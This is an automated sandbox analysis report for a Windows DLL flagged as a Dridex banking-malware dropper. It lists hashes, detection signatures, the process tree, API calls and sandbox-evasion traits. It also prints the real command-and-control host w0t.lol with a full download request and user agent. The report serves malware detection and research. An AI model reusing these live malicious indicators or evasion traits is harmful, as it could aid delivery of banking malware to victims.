Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e.dll

Overview

General Information

Sample name:e.dll
Analysis ID:1523389
MD5:972d3e17b96745be89b80ec5d8f4f9d3
SHA1:e97c6461bbdcd91566f4cb75b456e399b7fe06c2
SHA256:b116511e3960ab5fa53ad6a3243240be11235ebdc323705827713cf12a9aeeda
Infos:

Detection

Dridex Dropper
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Dridex dropper found
Found detection on Joe Sandbox Cloud Basic
System process connects to network (likely due to code injection or exploit)
Machine Learning detection for sample
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found decision node followed by non-executed suspicious APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • loaddll32.exe (PID: 2788 cmdline: loaddll32.exe "C:\Users\user\Desktop\e.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 5060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2460 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\e.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 856 cmdline: rundll32.exe "C:\Users\user\Desktop\e.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: e.dllAvira: detected
Machine Learning detection for sample
Source: e.dllJoe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_27AC1120 GetTickCount,SHGetValueA,SHSetValueA,UuidCreateSequential,sprintf,RtlComputeCrc32,GlobalAlloc,sprintf,RtlComputeCrc32,sprintf,RtlComputeCrc32,sprintf,GetModuleFileNameA,sprintf,GetCommandLineA,sprintf,memset,CryptBinaryToStringA,sprintf,memset,EnumDisplaySettingsA,sprintf,memcpy,memcpy,memset,GlobalFree,CryptAcquireContextA,CryptDecodeObjectEx,CryptImportPublicKeyInfo,CryptEncrypt,CryptBinaryToStringA,memset,GlobalFree,URLDownloadToCacheFileA,lstrlen,memset,GlobalFree,_lopen,_hread,_lclose,WinExec,GlobalFree,3_2_27AC1120
Source: e.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknownHTTPS traffic detected: 104.21.69.9:443 -> 192.168.11.20:49768 version: TLS 1.2
Source: Binary string: a:\s7i.pdbL source: e.dll
Source: Binary string: a:\s7i.pdb source: loaddll32.exe, 00000000.00000002.89094776577.000000000040F000.00000002.00000001.01000000.00000003.sdmp, e.dll
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06982A81 FindFirstFileW,3_3_06982A81

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 104.21.69.9 443Jump to behavior
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /S2wueuBWcKItxJBxaKQWGAqL7hMS3sfSm3IIJcJI-UnDuhqZF3FZYmhcdfYjgTH9ls8toERqLL6uvqWxks5TXG7p4KTZE3NtE0QUExXonRRsVxuWAUUUBfY4OBn0j6WOD9WysDP09mb9Mw2zw25E4216qfUiBb1_-f0hXmBwm-5V3zs05mClVySIs4Q2owQXkeB3urgLrouGFuJF9ZudjP54bzXceldzNx2o8pCLFM6WK1vNqyQJ4ZGEs5wabg119exWDBy_U0fDfIKkmquk4nx095rTVG61p-61BBPfkxzOTkQYmZHX6uOiApQ41hZ0OE5yH5VhrRws_4Dk7blD-zRqQGci0UruB3OYd7fIEanuxbGDB6PoPMh8nJxhyUjELjSu3EwICQdnYkBbiVs2LkVCWKmmn2lIaQTzB-OoNpw-dg1CW7D5qiS6SoaepRg HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: w0t.lolConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_27AC1120 GetTickCount,SHGetValueA,SHSetValueA,UuidCreateSequential,sprintf,RtlComputeCrc32,GlobalAlloc,sprintf,RtlComputeCrc32,sprintf,RtlComputeCrc32,sprintf,GetModuleFileNameA,sprintf,GetCommandLineA,sprintf,memset,CryptBinaryToStringA,sprintf,memset,EnumDisplaySettingsA,sprintf,memcpy,memcpy,memset,GlobalFree,CryptAcquireContextA,CryptDecodeObjectEx,CryptImportPublicKeyInfo,CryptEncrypt,CryptBinaryToStringA,memset,GlobalFree,URLDownloadToCacheFileA,lstrlen,memset,GlobalFree,_lopen,_hread,_lclose,WinExec,GlobalFree,3_2_27AC1120
Source: global trafficHTTP traffic detected: GET /S2wueuBWcKItxJBxaKQWGAqL7hMS3sfSm3IIJcJI-UnDuhqZF3FZYmhcdfYjgTH9ls8toERqLL6uvqWxks5TXG7p4KTZE3NtE0QUExXonRRsVxuWAUUUBfY4OBn0j6WOD9WysDP09mb9Mw2zw25E4216qfUiBb1_-f0hXmBwm-5V3zs05mClVySIs4Q2owQXkeB3urgLrouGFuJF9ZudjP54bzXceldzNx2o8pCLFM6WK1vNqyQJ4ZGEs5wabg119exWDBy_U0fDfIKkmquk4nx095rTVG61p-61BBPfkxzOTkQYmZHX6uOiApQ41hZ0OE5yH5VhrRws_4Dk7blD-zRqQGci0UruB3OYd7fIEanuxbGDB6PoPMh8nJxhyUjELjSu3EwICQdnYkBbiVs2LkVCWKmmn2lIaQTzB-OoNpw-dg1CW7D5qiS6SoaepRg HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: w0t.lolConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: w0t.lol
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 01 Oct 2024 13:14:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateCF-Cache-Status: DYNAMICSpeculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8cbcb62419383343-MIA
Source: rundll32.exe, 00000003.00000002.84973852233.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.84857080785.00000000033CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: rundll32.exe, 00000003.00000002.84973852233.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.84857080785.00000000033CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000003.00000002.84973852233.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.84857080785.00000000033CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: rundll32.exe, 00000003.00000003.84857412676.00000000033AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.84973750078.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.84857294274.000000000339C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: rundll32.exe, 00000003.00000002.84973852233.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.84857080785.00000000033CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: rundll32.exe, 00000003.00000003.84857294274.000000000339C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.84973703050.000000000339D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w0t.lol/
Source: rundll32.exe, 00000003.00000002.84973505391.0000000003352000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.84973703050.000000000339D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w0t.lol/S2wueuBWcKItxJBxaKQWGAqL7hMS3sfSm3IIJcJI-UnDuhqZF3FZYmhcdfYjgTH9ls8toERqLL6uvqWxks5T
Source: rundll32.exe, 00000003.00000002.84973703050.000000000339D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w0t.lol/T
Source: rundll32.exe, 00000003.00000003.84857294274.000000000339C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.84973703050.000000000339D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w0t.lol/v
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownHTTPS traffic detected: 104.21.69.9:443 -> 192.168.11.20:49768 version: TLS 1.2

E-Banking Fraud

barindex
Dridex dropper found
Source: Initial fileSignature Results: Dridex dropper behavior

System Summary

barindex
Found detection on Joe Sandbox Cloud Basic
Source: e.dllJoe Sandbox Cloud Basic: Detection: malicious Score: 80 Threat Name: Dridex Dropper Analyzer: w10x64nativePerma Link
Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 6%
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06966790 NtQueryDirectoryObject,3_3_06966790
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0696D969 NtQuerySystemInformation,3_3_0696D969
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_051B2084 NtCreateThreadEx,3_2_051B2084
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0695D53D: DeviceIoControl,3_3_0695D53D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0533E58D3_3_0533E58D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0683112C3_3_0683112C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_068318AC3_3_068318AC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06835AF13_3_06835AF1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_068333343_3_06833334
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_068349DC3_3_068349DC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06832F7C3_3_06832F7C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0683371C3_3_0683371C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069312903_3_06931290
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0695D0903_3_0695D090
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069667903_3_06966790
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069627903_3_06962790
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06982C903_3_06982C90
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0695D7803_3_0695D780
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06982A813_3_06982A81
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06966CBB3_3_06966CBB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0696C3A03_3_0696C3A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06968DA03_3_06968DA0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0696A5D63_3_0696A5D6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06932BD63_3_06932BD6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0696CFC03_3_0696CFC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0696F1F33_3_0696F1F3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069689F03_3_069689F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069712F03_3_069712F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069852F23_3_069852F2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0696E3E03_3_0696E3E0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0696C5E03_3_0696C5E0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06960EE03_3_06960EE0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06984F103_3_06984F10
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069702063_3_06970206
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0696CD003_3_0696CD00
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06983C003_3_06983C00
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0696BB303_3_0696BB30
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0695D53D3_3_0695D53D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069626253_3_06962625
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069622203_3_06962220
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06987F593_3_06987F59
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069613703_3_06961370
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0696DB703_3_0696DB70
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0696CB603_3_0696CB60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069823603_3_06982360
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06984C603_3_06984C60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0696D9693_3_0696D969
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069859903_3_06985990
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0693338A3_3_0693338A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069354893_3_06935489
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0693308E3_3_0693308E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0693408E3_3_0693408E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069335BB3_3_069335BB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0695CDD03_3_0695CDD0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0696A7D03_3_0696A7D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069333D53_3_069333D5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069709D03_3_069709D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069336DC3_3_069336DC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06932DC03_3_06932DC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0696D4C03_3_0696D4C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06971DC03_3_06971DC0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069330CB3_3_069330CB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069332CE3_3_069332CE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069855F03_3_069855F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06932DFE3_3_06932DFE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069821E03_3_069821E0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069460143_3_06946014
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069336113_3_06933611
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069685103_3_06968510
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06962D103_3_06962D10
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069711103_3_06971110
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069310003_3_06931000
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069331063_3_06933106
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069704003_3_06970400
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0696FE303_3_0696FE30
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069878303_3_06987830
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069333223_3_06933322
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069330283_3_06933028
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0695E4503_3_0695E450
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0695E8503_3_0695E850
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069330553_3_06933055
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06985F503_3_06985F50
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069333583_3_06933358
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0696C1423_3_0696C142
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069686403_3_06968640
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0696FB403_3_0696FB40
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069826403_3_06982640
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06932E4E3_3_06932E4E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0696DE703_3_0696DE70
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0693327A3_3_0693327A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0696A1603_3_0696A160
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069336653_3_06933665
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_06970C603_3_06970C60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050916803_2_05091680
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050922A83_2_050922A8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_05091EAF3_2_05091EAF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050916983_2_05091698
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050940943_2_05094094
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0509252C3_2_0509252C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050944583_2_05094458
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050945E83_2_050945E8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_051BA9003_2_051BA900
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_051B163D3_2_051B163D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_051BA6603_2_051BA660
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_051B20843_2_051B2084
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_051B22A03_2_051B22A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_051B71D23_2_051B71D2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_051B74103_2_051B7410
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_051B12403_2_051B1240
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_27AC11203_2_27AC1120
Source: e.dllStatic PE information: Number of sections : 13 > 10
Source: e.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: e.dllStatic PE information: Section: z4g ZLIB complexity 0.9946666190294715
Source: e.dllStatic PE information: Section: qm ZLIB complexity 0.9991314643252213
Source: e.dllStatic PE information: Section: L ZLIB complexity 0.9966262291217672
Source: classification engineClassification label: mal72.bank.evad.winDLL@6/0@1/1
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:304:WilStaging_02
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\e.dll",#1
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\e.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\e.dll",#1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\e.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\e.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\e.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: z55x9i2q7.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\SecurityJump to behavior
Source: e.dllStatic file information: File size 2228224 > 1048576
Source: e.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: a:\s7i.pdbL source: e.dll
Source: Binary string: a:\s7i.pdb source: loaddll32.exe, 00000000.00000002.89094776577.000000000040F000.00000002.00000001.01000000.00000003.sdmp, e.dll
Source: e.dllStatic PE information: section name: .crt1
Source: e.dllStatic PE information: section name: z4g
Source: e.dllStatic PE information: section name: qm
Source: e.dllStatic PE information: section name: L
Source: e.dllStatic PE information: section name: CONST
Source: e.dllStatic PE information: section name: 3
Source: e.dllStatic PE information: section name: buicKDZl
Source: e.dllStatic PE information: section name: CRT
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0060996B pushfd ; ret 0_2_0060997B
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00570E37 push eax; retf 0_2_00570E3E
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0060D1F4 push edi; ret 0_2_0060D1F5
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_006099DB pushfd ; iretd 0_2_006099DC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_0533D5C8 push ebp; retf 3_3_0533D5C9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_069825F0 push esi; mov dword ptr [esp], ecx3_3_069825F4
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
